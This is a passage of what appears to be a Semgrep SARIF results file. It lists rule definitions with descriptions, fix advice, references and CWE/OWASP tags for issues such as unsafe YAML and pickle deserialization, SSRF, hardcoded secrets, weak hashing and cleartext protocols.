steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"help":{"markdown":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n","text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","id":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","name":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request)\n - [https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html](https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html)\n","text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","id":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","name":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","id":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","name":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host","id":"python.django.security.injection.tainted-url-host.tainted-url-host","name":"python.django.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"help":{"markdown":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","id":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","name":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.detailed-exceptions.detailed-exceptions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"help":{"markdown":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle)\n - [https://github.com/jsonpickle/jsonpickle#jsonpickle](https://github.com/jsonpickle/jsonpickle#jsonpickle)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","id":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","name":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","id":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","name":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"help":{"markdown":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv","id":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","name":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","properties":{"precision":"very-high","tags":["CWE-329: Not using a random initialization Vector (IV) with Cipher Block Chaining (CBC) Mode causes algorithms to be susceptible to dictionary attacks.","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-iv.hardcoded-iv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","id":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","name":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"help":{"markdown":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode)\n - [https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96](https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96)\n","text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"helpUri":"https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","id":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","name":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.unverified-jwt-decode.unverified-jwt-decode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token","id":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","name":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.axios.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"help":{"markdown":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn)\n - [http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html](http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html)\n","text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"helpUri":"https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","id":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","name":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"help":{"markdown":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key","id":"generic.secrets.security.detected-private-key.detected-private-key","name":"generic.secrets.security.detected-private-key.detected-private-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-private-key.detected-private-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"help":{"markdown":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use)\n - [https://www.php.net/manual/en/intro.ftp.php](https://www.php.net/manual/en/intro.ftp.php)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php)\n","text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"helpUri":"https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use","id":"php.lang.security.ftp-use.ftp-use","name":"php.lang.security.ftp-use.ftp-use","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.ftp-use.ftp-use"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"help":{"markdown":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied)\n - [https://go101.org/article/concurrent-common-mistakes.html](https://go101.org/article/concurrent-common-mistakes.html)\n","text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"helpUri":"https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","id":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","name":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled)\n - [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)\n","text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","id":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","name":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask)\n - [https://docs.python.org/3/library/os.html#os.environ](https://docs.python.org/3/library/os.html#os.environ)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","id":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","name":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"help":{"markdown":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods)\n - [https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb](https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb)\n","text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","id":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","name":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","id":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","name":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"help":{"markdown":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality.\n\nReferences:\n - [Semgrep 